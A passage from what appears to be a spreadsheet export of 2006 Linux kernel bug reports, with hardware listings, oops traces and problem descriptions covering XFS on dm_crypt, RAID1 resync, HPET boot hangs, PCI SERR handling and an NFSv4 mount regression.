D0 PME-Enable+ DSel=0 DScale=0 PME- 0000:00:08.0 PCI bridge: nVidia Corporation nForce2 External PCI Bridge (rev a3) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 I/O behind bridge: 00009000-0000afff Memory behind bridge: e7000000-e8ffffff Prefetchable memory behind bridge: 40000000-400fffff BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- 0000:00:09.0 IDE interface: nVidia Corporation nForce2 IDE (rev a2) (prog-if 8a [Master SecP PriP]) Subsystem: ASUSTeK Computer Inc.: Unknown device 0c11 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Region 4: I/O ports at f000 [size=16] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:0d.0 FireWire (IEEE 1394): nVidia Corporation nForce2 FireWire (IEEE 1394) Controller (rev a3) (prog-if 10 [OHCI]) Subsystem: ASUSTeK Computer Inc.: Unknown device 809a Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin A routed to IRQ 201 Region 0: Memory at e9003000 (32-bit, non-prefetchable) [size=2K] Region 1: Memory at e9004000 (32-bit, non-prefetchable) [size=64] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ 0000:00:1e.0 PCI bridge: nVidia Corporation nForce2 AGP (rev c1) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Bus: primary=00, secondary=03, subordinate=03, sec-latency=32 I/O behind bridge: 0000f000-00000fff Memory behind bridge: e5000000-e6ffffff Prefetchable memory behind bridge: d0000000-dfffffff BridgeCtl: Parity- SERR+ NoISA- VGA+ MAbort- &gt;Reset- FastB2B- 0000:01:04.0 Ethernet controller: Marvell Technology Group Ltd. 88E8001 Gigabit Ethernet Controller (rev 13) Subsystem: ASUSTeK Computer Inc. Marvell 88E8001 Gigabit Ethernet Controller (Asus) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (5750ns min, 7750ns max), Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 209 Region 0: Memory at e8000000 (32-bit, non-prefetchable) [size=16K] Region 1: I/O ports at 9000 [size=256] Expansion ROM at 40080000 [disabled] [size=128K] Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data 0000:01:07.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 08) Subsystem: Creative Labs SBLive! 5.1 Model SB0100 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (500ns min, 5000ns max) Interrupt: pin A routed to IRQ 217 Region 0: I/O ports at 9400 [size=32] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:01:07.1 Input device controller: Creative Labs SB Live! MIDI/Game Port (rev 08) Subsystem: Creative Labs Gameport Joystick Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Region 0: I/O ports at 9800 [size=8] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:01:0b.0 RAID bus controller: Silicon Image, Inc. SiI 3112 [SATALink/SATARaid] Serial ATA Controller (rev 02) Subsystem: Silicon Image, Inc. SiI 3112 SATARaid Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 177 Region 0: I/O ports at 9c00 [size=8] Region 1: I/O ports at a000 [size=4] Region 2: I/O ports at a400 [size=8] Region 3: I/O ports at a800 [size=4] Region 4: I/O ports at ac00 [size=16] Region 5: Memory at e8004000 (32-bit, non-prefetchable) [size=512] Expansion ROM at 40000000 [disabled] [size=512K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=2 PME- 0000:03:00.0 VGA compatible controller: nVidia Corporation NV31 [GeForce FX 5600] (rev a1) (prog-if 00 [VGA]) Subsystem: CardExpert Technology: Unknown device 0604 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 9 Region 0: Memory at e5000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at d0000000 (32-bit, prefetchable) [size=256M] Expansion ROM at e6000000 [disabled] [size=128K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [44] AGP version 3.0 Status: RQ=32 Iso- ArqSz=0 Cal=3 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+ Rate=x4,x8 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; SCSI Information: root@mediapc:/usr/src/linux/scripts# cat /proc/scsi/scsi Attached devices: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: ST3320620AS Rev: 3.AA Type: Direct-Access ANSI SCSI revision: 05 Host: scsi1 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: ST3320620AS Rev: 3.AA Type: Direct-Access ANSI SCSI revision: 05</t>
  </si>
  <si>
    <t>Open of large file on 32-bit fails with EFBIG, should be EOVERFLOW</t>
  </si>
  <si>
    <t>2006-10-03 01:32 UTC</t>
  </si>
  <si>
    <t>2008-09-14 06:47 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: all kernets have this bug Distribution: Hardware Environment: x86 (and probably other 32-bit arches) Software Environment: Problem Description: In the SUSv3 specification of open(), the following error is described: [EOVERFLOW] The named file is a regular file and the size of the file cannot be represented correctly in an object of type off_t. However, on most Linux file systems if an application tries, on a 32-bit architecture, to open a file of size greater than 2 GB without specifying O_LARGEFILE (or without being compiled with -D_FILE_OFFSET_BITS=64), then the resulting error is EFBIG. It should be EOVERFLOW, as far as I can see. The EFBIG error occurs on ext2, ext3, XFS, and JFS. In this scenario, no error is returned from the open() on Reiserfs. I am not sure whether this is a (different) bug or not. (I suspect it is a separate bug.) Steps to reproduce:</t>
  </si>
  <si>
    <t>XFS on dm_crypt Oops</t>
  </si>
  <si>
    <t>2.6.18�@and 2.6.17-1.2187_FC5 and 2.6.15-1.2054_FC5</t>
  </si>
  <si>
    <t>2006-10-03 19:06 UTC</t>
  </si>
  <si>
    <t>KatagiriWayou</t>
  </si>
  <si>
    <t>2008-09-22 17:07 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.9 Distribution: Fedoracore5 Hardware Environment: ------[lspci output]--------------------------------------------------------- 00:00.0 RAM memory: nVidia Corporation MCP55 Memory Controller (rev a1) 00:01.0 ISA bridge: nVidia Corporation MCP55 LPC Bridge (rev a2) 00:01.1 SMBus: nVidia Corporation MCP55 SMBus (rev a2) 00:01.2 RAM memory: nVidia Corporation MCP55 Memory Controller (rev a2) 00:02.0 USB Controller: nVidia Corporation MCP55 USB Controller (rev a1) 00:02.1 USB Controller: nVidia Corporation MCP55 USB Controller (rev a2) 00:04.0 IDE interface: nVidia Corporation MCP55 IDE (rev a1) 00:05.0 IDE interface: nVidia Corporation MCP55 SATA Controller (rev a2) 00:05.1 IDE interface: nVidia Corporation MCP55 SATA Controller (rev a2) 00:05.2 IDE interface: nVidia Corporation MCP55 SATA Controller (rev a2) 00:06.0 PCI bridge: nVidia Corporation Unknown device 0370 (rev a2) 00:06.1 Audio device: nVidia Corporation MCP55 High Definition Audio (rev a2) 00:08.0 Bridge: nVidia Corporation MCP55 Ethernet (rev a2) 00:0a.0 PCI bridge: nVidia Corporation Unknown device 0376 (rev a2) 00:0b.0 PCI bridge: nVidia Corporation Unknown device 0374 (rev a2) 00:0c.0 PCI bridge: nVidia Corporation Unknown device 0374 (rev a2) 00:0d.0 PCI bridge: nVidia Corporation Unknown device 0378 (rev a2) 00:0e.0 PCI bridge: nVidia Corporation Unknown device 0375 (rev a2) 00:0f.0 PCI bridge: nVidia Corporation Unknown device 0377 (rev a2) 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 01:07.0 Ethernet controller: Intel Corporation 82544EI Gigabit Ethernet Controller (Copper) (rev 02) 01:08.0 VGA compatible unclassified device: Texas Instruments TVP4020 [Permedia 2] (rev 01) 02:00.0 Mass storage controller: Silicon Image, Inc. SiI 3132 Serial ATA Raid II Controller (rev 01) 04:00.0 Mass storage controller: Silicon Image, Inc. SiI 3132 Serial ATA Raid II Controller (rev 01) 05:00.0 Mass storage controller: Silicon Image, Inc. SiI 3132 Serial ATA Raid II Controller (rev 01) ----[CPU]------------------------------------------------------------------ processor : 0 vendor_id : AuthenticAMD cpu family : 15 model : 79 model name : AMD Athlon(tm) 64 Processor 3500+ stepping : 2 cpu MHz : 1000.000 cache size : 512 KB fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt rdtscp lm 3dnowext 3dnow up pni cx16 lahf_lm svm cr8_legacy bogomips : 2010.91 TLB size : 1024 4K pages clflush size : 64 cache_alignment : 64 address sizes : 40 bits physical, 48 bits virtual power management: ts fid vid ttp tm stc ----------------------------------------------------------------------------- Software Environment: ----------------lsmod------------------------------------------------------ aes 60352 1 dm_crypt 46224 1 xfs 558936 2 ipv6 426848 12 ppdev 43528 0 autofs4 59144 1 hidp 84096 2 l2cap 92544 5 hidp bluetooth 124932 2 hidp,l2cap sunrpc 211912 1 ip_nat_ftp 37504 0 ip_conntrack_ftp 42448 1 ip_nat_ftp ip_conntrack_netbios_ns 36736 0 xt_limit 36608 2 xt_tcpudp 37120 30 iptable_filter 36864 1 ipt_MASQUERADE 37632 1 iptable_nat 41988 1 ip_nat 55084 3 ip_nat_ftp,ipt_MASQUERADE,iptable_nat ip_conntrack 96164 6 ip_nat_ftp,ip_conntrack_ftp,ip_conntrack_netbios_ns,ipt_MASQUERADE,iptable_nat, ip_nat nfnetlink 41800 2 ip_nat,ip_conntrack ip_tables 57184 2 iptable_filter,iptable_nat x_tables 52616 5 xt_limit,xt_tcpudp,ipt_MASQUERADE,iptable_nat,ip_tables raid456 155424 1 xor 39568 1 raid456 raid0 41472 1 video 53512 0 button 41632 0 battery 45064 0 asus_acpi 52516 0 ac 39688 0 lp 49232 0 parport_pc 64936 1 parport 77708 3 ppdev,lp,parport_pc ohci_hcd 55812 0 ehci_hcd 67848 0 floppy 100424 0 sg 72360 0 serio_raw 41732 0 snd_hda_intel 54300 0 snd_hda_codec 224128 1 snd_hda_intel snd_seq_dummy 37892 0 snd_seq_oss 70656 0 snd_seq_midi_event 42496 1 snd_seq_oss snd_seq 97184 5 snd_seq_dummy,snd_seq_oss,snd_seq_midi_event e1000 160576 0 snd_seq_device 43028 3 snd_seq_dummy,snd_seq_oss,snd_seq sata_sil24 50820 8 snd_pcm_oss 82176 0 forcedeth 77828 0 snd_mixer_oss 52224 1 snd_pcm_oss snd_pcm 125704 3 snd_hda_intel,snd_hda_codec,snd_pcm_oss pcspkr 37120 0 snd_timer 60680 2 snd_seq,snd_pcm snd 102440 9 snd_hda_intel,snd_hda_codec,snd_seq_oss,snd_seq,snd_seq_device,snd_pcm_oss,snd_ mixer_oss,snd_p cm,snd_timer soundcore 45344 1 snd i2c_nforce2 42240 0 i2c_core 58880 1 i2c_nforce2 snd_page_alloc 44560 2 snd_hda_intel,snd_pcm dm_snapshot 50640 0 dm_zero 35328 0 dm_mirror 56576 0 dm_mod 99536 9 dm_crypt,dm_snapshot,dm_zero,dm_mirror raid1 57600 1 ext3 177296 2 jbd 99440 1 ext3 sata_nv 46468 14 libata 142880 2 sata_sil24,sata_nv sd_mod 55808 34 scsi_mod 191056 3 sg,libata,sd_mod ------------------------------------------------------------------------------ Problem Description: The Oops message was outout from kernel with xfs filesystem on dm_crypt With 2.6.15 and 2.6.18 Oops was output. With 2.6.17 the system do kernel panic end. The constitution of filesystem [Disk x 6]--[sata_nv]-------------+--Raid6--dm_crypt--XFS [Disk x 6]--[sii3132(sata_si124)]-+ I copied the files (all size=~1T) to the XFS file system by "rsync" or "cp". Once in about 10 hours, this problem occurs it. The Oops message is following ------------------------------------------------------------------------------ Oct 3 07:27:21 alice kernel: Unable to handle kernel NULL pointer dereference at 0000000000000000 RIP: Oct 3 07:27:21 alice kernel: &lt;ffffffff80121b7d&gt;{page_to_pfn+0} Oct 3 07:27:21 alice kernel: PGD 7462c067 PUD 745e0067 PMD 747e0067 PTE 0 Oct 3 07:27:21 alice kernel: Oops: 0000 [1] SMP Oct 3 07:27:21 alice kernel: last sysfs file: /devices/system/cpu/cpu0/cpufreq/scaling_setspeed Oct 3 07:27:21 alice kernel: CPU 0 Oct 3 07:27:21 alice kernel: Modules linked in: aes dm_crypt raid5 nls_utf8 hfsplus xfs exportfs ipv6 ppdev autofs4 i2c_dev i 2c_core hidp l2cap bluetooth vmnet(U) vmmon(U) sunrpc ip_nat_ftp ip_conntrack_ftp ip_conntrack_netbios_ns xt_limit xt_tcpudp i ptable_filter ipt_MASQUERADE iptable_nat ip_nat ip_conntrack nfnetlink ip_tables x_tables dm_mirror dm_mod raid6 xor raid0 vid eo button battery ac lp parport_pc parport floppy nvram sg ehci_hcd ohci_hcd sata_sil24 e1000 snd_hda_intel snd_hda_codec snd_ seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss snd_pcm forcedeth snd_timer snd soun dcore snd_page_alloc raid1 ext3 jbd sata_nv libata sd_mod scsi_mod Oct 3 07:27:21 alice kernel: Pid: 6567, comm: pdflush Tainted: P 2.6.15- 1.2054_FC5.root #1 Oct 3 07:27:21 alice kernel: RIP: 0010:[&lt;ffffffff80121b7d&gt;] &lt;ffffffff80121b7d&gt; {page_to_pfn+0} Oct 3 07:27:21 alice kernel: RSP: 0018:ffff8100366ad760 EFLAGS: 00010293 Oct 3 07:27:21 alice kernel: RAX: 0000000000000000 RBX: ffff81007ec18540 RCX: 0000000000000000 Oct 3 07:27:21 alice kernel: RDX: 0000000000000016 RSI: ffff81007ec18540 RDI: 0000000000000000 Oct 3 07:27:21 alice kernel: RBP: ffff81002abec400 R08: 0000000000000000 R09: ffff81003d6fa7a0 Oct 3 07:27:21 alice kernel: R10: 0000000000000000 R11: ffffffff80338fbb R12: ffff81007ec18540 Oct 3 07:27:21 alice kernel: R13: 0000000000000000 R14: 0000000000000000 R15: ffff8100033b4ce8 Oct 3 07:27:21 alice kernel: FS: 00002accf750dd10(0000) GS:ffffffff8050b000 (0000) knlGS:00000000f7f9a6b0 Oct 3 07:27:21 alice kernel: CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b Oct 3 07:27:21 alice kernel: CR2: 0000000000000000 CR3: 00000000746c2000 CR4: 00000000000006e0 Oct 3 07:27:21 alice kernel: Process pdflush (pid: 6567, threadinfo ffff8100366ac000, task ffff81003d6fa7a0) Oct 3 07:27:21 alice kernel: Stack: ffffffff801f30c0 ffff81003d6fa7a0 0000000000006c80 0000000000000000 Oct 3 07:27:21 alice kernel: ffff810000000000 0000000000000001 ffff81007ec18540 ffff8100033b4ce8 Oct 3 07:27:21 alice kernel: ffff810027c32cc0 ffff81001acd9728 Oct 3 07:27:21 alice kernel: Call Trace: &lt;ffffffff801f30c0&gt; {blk_recount_segments+126} Oct 3 07:27:21 alice kernel: &lt;ffffffff80183c00&gt;{__bio_clone+113} &lt;ffffffff80183c4f&gt;{bio_clone+53} Oct 3 07:27:21 alice kernel: &lt;ffffffff885e673a&gt; {:dm_crypt:crypt_map+205} &lt;ffffffff883002c9&gt;{:dm_mod:__map_bio+71} Oct 3 07:27:21 alice kernel: &lt;ffffffff88300cea&gt; {:dm_mod:__split_bio+381} &lt;ffffffff8830151a&gt;{:dm_mod:dm_request+337} Oct 3 07:27:21 alice kernel: &lt;ffffffff801f3f52&gt; {generic_make_request+365} &lt;ffffffff801f573c&gt;{submit_bio+186} Oct 3 07:27:21 alice kernel: &lt;ffffffff80183691&gt;{__bio_add_page+393} &lt;ffffffff8858345a&gt;{:xfs:xfs_submit_ioend_bio+30} Oct 3 07:27:21 alice kernel: &lt;ffffffff88583ea2&gt; {:xfs:xfs_page_state_convert+2623} Oct 3 07:27:21 alice kernel: &lt;ffffffff88584218&gt; {:xfs:linvfs_writepage+167} &lt;ffffffff801a0028&gt;{mpage_writepages+462} Oct 3 07:27:21 alice kernel: &lt;ffffffff88584171&gt; {:xfs:linvfs_writepage+0} &lt;ffffffff80160f40&gt;{do_writepages+46} Oct 3 07:27:21 alice kernel: &lt;ffffffff8019e937&gt; {__writeback_single_inode+449} &lt;ffffffff8019edf6&gt;{sync_sb_inodes+472} Oct 3 07:27:21 alice kernel: &lt;ffffffff80145afb&gt; {keventd_create_kthread+0} &lt;ffffffff8019f3a5&gt;{writeback_inodes+149} Oct 3 07:27:21 alice kernel: &lt;ffffffff8016127a&gt; {background_writeout+112} &lt;ffffffff8016189a&gt;{pdflush+0} Oct 3 07:27:21 alice kernel: &lt;ffffffff80161a0e&gt;{pdflush+372} &lt;ffffffff8016120a&gt;{background_writeout+0} Oct 3 07:27:21 alice kernel: &lt;ffffffff80145de0&gt;{kthread+254} &lt;ffffffff8010b8e6&gt;{child_rip+8} Oct 3 07:27:21 alice kernel: &lt;ffffffff80145afb&gt; {keventd_create_kthread+0} &lt;ffffffff80338fbb&gt;{thread_return+0} Oct 3 07:27:21 alice kernel: &lt;ffffffff80145ce2&gt;{kthread+0} &lt;ffffffff8010b8de&gt;{child_rip+0} Oct 3 07:27:21 alice kernel: Oct 3 07:27:21 alice kernel: Code: 48 8b 07 48 c1 e8 38 48 8b 04 c5 40 41 53 80 48 2b b8 20 0a Oct 3 07:27:21 alice kernel: RIP &lt;ffffffff80121b7d&gt;{page_to_pfn+0} RSP &lt;ffff8100366ad760&gt; Oct 3 07:27:21 alice kernel: CR2: 0000000000000000 Steps to reproduce:</t>
  </si>
  <si>
    <t>astest in "scripts/Kbuild.include" in 2.6.18-mmx kernels causing sandbox violations</t>
  </si>
  <si>
    <t>2.6.18-mm1, 2.6.18-mm2, 2.6.18-mm3</t>
  </si>
  <si>
    <t>2006-10-04 04:53 UTC</t>
  </si>
  <si>
    <t>Jan Peter den Heijer</t>
  </si>
  <si>
    <t>2007-05-31 11:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18-rc7-mm1 (and 2.6.18 vanilla) Distribution: Gentoo Hardware Environment: Software Environment: Problem Description: Gentoo uses a sandbox to compile kernel-modules from source. Recent mm-kernel introduced astest in "scripts/Kbuild.include". This test write a file in the kernel tree for which the module is being compiled. This causes the "emerge" to fail because of a sandbox violation. Steps to reproduce: "emerge" any kernel-module in portage when "/usr/src/linux" is a symlink to any 2.6.18-mm tree</t>
  </si>
  <si>
    <t>RAID1 seems to be broken</t>
  </si>
  <si>
    <t>2006-10-04 09:59 UTC</t>
  </si>
  <si>
    <t>Hans-Peter Bock</t>
  </si>
  <si>
    <t>2006-10-04 17:44 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17.3 Distribution: Debian stable Problem Description: after adding a block device to a degraded raid1 there seems to be no resync; the new device is just reported as up Steps to reproduce: mdadm /dev/md0 -a /dev/sdc1</t>
  </si>
  <si>
    <t>boot fails unless "hpet=disable" - MSI S420 / MS-141214 notebook</t>
  </si>
  <si>
    <t>2.6.15-27</t>
  </si>
  <si>
    <t>2006-10-05 00:32 UTC</t>
  </si>
  <si>
    <t>Dimitri V.L.</t>
  </si>
  <si>
    <t>2007-10-30 15:06 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none. I tried ubuntu edgy live cd (2.6.17-x), same problems Distribution: Ubuntu Linux, also tried booting fedora and knoppix, to no avail Hardware Environment: MSI-S420 notebook (MS-141214 barebone) Software Environment: kernel Problem Description: Just bought this notebook, and it wont boot unless I add "acpi=off" or "hpet=disable" to the kernel parameters. This bug might be related to Bug 6984 since that is also an MSI notebook with an ATI chipset. When I boot with no options, there are the last kernel messages: using HPET for base-timer using HPET for gettimeofday Detected 2000.186 MHz processor Using hpet for high-res timesource. After that, the machine hangs (even no response to sysrq key combinations). I tried "nohpet" instead of "hpet=disable" but that doesn't work. If more information is needed (which it probably will be), please point me to the right resources with information on how to obtain that information. I am not a kernel hacker. Steps to reproduce: boot without "acpi=off" or "hpet=disable".</t>
  </si>
  <si>
    <t>Dallas's 1-ware bus menu item is not avaliable</t>
  </si>
  <si>
    <t>2.6.19-rc1</t>
  </si>
  <si>
    <t>2006-10-05 05:42 UTC</t>
  </si>
  <si>
    <t>2006-12-03 03:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18 Distribution: Slackware 10.2 Software Environment: Linux dbagrii 2.6.18 #1 SMP Wed Sep 20 12:34:18 EEST 2006 i686 pentium4 i386 GNU/Linux Gnu C 3.3.6 Gnu make 3.80 binutils 2.15.92.0.2 util-linux 2.12p mount 2.12p module-init-tools 3.1 e2fsprogs 1.38 reiserfsprogs 3.6.19 xfsprogs 2.6.13 pcmcia-cs 3.2.8 PPP 2.4.4b1 nfs-utils 1.0.7 Linux C Library 2.3.6 Dynamic linker (ldd) 2.3.6 Linux C++ Library 5.0.7 Procps 3.2.5 Net-tools 1.60 Kbd 1.12 Sh-utils 5.97 udev 094 Modules Loaded ext2 Problem Description: "Dallas's 1-ware bus" menu item is empty in the menuconfig. Steps to reproduce: Apply patch-2.6.19-rc1 to the kernel 2.6.18 source; $ cd /usr/src/linux $ make menuconfig Go to "Device Drivers" ---&gt; "Dallas's 1-wire bus"</t>
  </si>
  <si>
    <t>PCI SERR on x86_64 system should be handled in traps.c.</t>
  </si>
  <si>
    <t>2.4 and 2.6</t>
  </si>
  <si>
    <t>2006-10-05 21:30 UTC</t>
  </si>
  <si>
    <t>Ryutaro Hayashi</t>
  </si>
  <si>
    <t>2007-01-03 21:42 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: RHEL 4, but applicable for all of 2.4 and 2.6 Hardware Environment: x86_64(AMD Opteron, Xeon) Software Environment: N/A Problem Description: When PCI SERR occurs on modern chipset system like AMD Opteron and Xeon with I/O Hub, linux kernel show us the message that indicates momory error. But, SERR is caused by problem of PCI system. If SERR happens, I/O Hub assert #NMI to CPU local APIC and linux kernel try to read I/O Port#0x61 with inb() in order to read NMI reason. Then, if data is 0x80, show us the following message. ----------------------------------------------------------------------- Sep 26 11:28:37 XXXXX kernel: Uhhuh. NMI received. Dazed and confused, but trying to continue Sep 26 11:28:37 XXXXX kernel: You probably have a hardware problem with your RAM chips ----------------------------------------------------------------------- But, 0x80(bit 7) means PCI SERR on AMD Opteron and Xeon system with I/O Hub like Intel 82801EB and AMD-8111. I think other modern I/O hubs are the same. Although the above message suggest that administrator had better try to change memory module, root cause is PCI system. So, possible causes are PCI Controller(I/O Hub), System Bus and all PCI Card. If we need to investigate more specifically, linux kernel need to read and print contents of PCI config register and other status registers. The problem is that PCI SERR is not handled in x86_64/kernel/traps.c correctly. So, if SERR occurs, kernel should be print messages that indicate PCI SERR. Also, PCI Config register should be read and should be printed to see if SERR is caused by master abort or target abort. So please add handler routine for PCI SERR in x86_64/kernel/traps.c. Steps to reproduce: I'm not sure since PCI SERR is H/W fault. But you might be able to reproduce PCI SERR from software with setting bit 7 of I/O Port#0x61 using outb(). Reference: &amp;#9675; Intel 82801EB I/O Controller Hub 5 (ICH5) and Datasheet http://developer.intel.com/design/chipsets/datashts/25251601.pdf Page 373 - 9.7.1 NMI_SC&amp;#8213;NMI Status and Control Register &amp;#9675; AMD-8111 HyperTransport I/O Hub Data Sheet http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/24674.pdf Page 162 - AT Compatibility Register Best Regards,</t>
  </si>
  <si>
    <t>X lockups when X is using AGP.</t>
  </si>
  <si>
    <t>2006-10-06 08:04 UTC</t>
  </si>
  <si>
    <t>Andrew Clayton</t>
  </si>
  <si>
    <t>2007-01-31 08:55 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Unknown, it's happened as long as I've had this machine, a year or so. Distribution: Fedora Core 5 (64bit) Hardware Environment: Single proc AMD64 3500 with 1GBRAM. AGP Radeon 9200SE using Xorg (7.0) radeon driver. Software Environment: Kernel 2.6.18, Xorg 7.0 (latest update from FC 5) Problem Description: When using agp and DRI the X will lock up after a few minutes, Logging in over the network and trying to kill/restart X generally results in the machine hanging. Steps to reproduce: With the above configuration X will lockup within minutes. This problem has been discussed on LKML and has a Xorg bugzilla entry. http://www.ussg.iu.edu/hypermail/linux/kernel/0609.2/1706.html https://bugs.freedesktop.org/show_bug.cgi?id=6111 Today I tried the BusType PCI workaround and that seems to have stopped the hangs. I'll attach my current working xorg.conf and kernel .config If I was to comment out the Option "BusType" "PCI" I would get the hangs. Really just putting this here to help track this issue... Cheers, Andrew</t>
  </si>
  <si>
    <t>NFSv4 fails to mount (timeout) on kernel 2.6.19-rc1</t>
  </si>
  <si>
    <t>2006-10-06 09:51 UTC</t>
  </si>
  <si>
    <t>2006-10-20 13:48 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: vanilla 2.6.18 all 2.6.18-mm[1..3] have the bug. I did a git-bisect to track it down to this commit: 51b6ded4d9a94a61035deba1d8f51a54e3a3dd86 is first bad commit commit 51b6ded4d9a94a61035deba1d8f51a54e3a3dd86 Author: Trond Myklebust &lt;Trond.Myklebust@netapp.com&gt; Date: Fri Sep 15 16:31:56 2006 -0400 NFSv4: When mounting with a port=0 argument, substitute port=2049 RFC3530 states that the registered port 2049 for the NFS protocol should be the default configuration in order to allow clients not to use the RPC binding protocols. If the mount program sends us a port=0, we therefore substitute port=2049. Signed-off-by: Trond Myklebust &lt;Trond.Myklebust@netapp.com&gt; :040000 040000 f093abbb7cb6a01155ee2d2a820839ca2e9edadb 4f90adecb2095bc921bcac83d9cff3c0fc1f5388 M fs Distribution: Gentoo-2006.1 Hardware Environment: x86_64 server, i386 client Software Environment: NFS-Server: tested with 2.6.18-mm2, but the same error could be seen with 2.6.17-rc6-mm2 as server. NFS-Client: 2.6.17 and 2.6.18 work, but 2.6.19-rc1 fails with the same configuration The fstab entry of the failing mount: 192.168.0.4:/portage /usr/portage nfs4 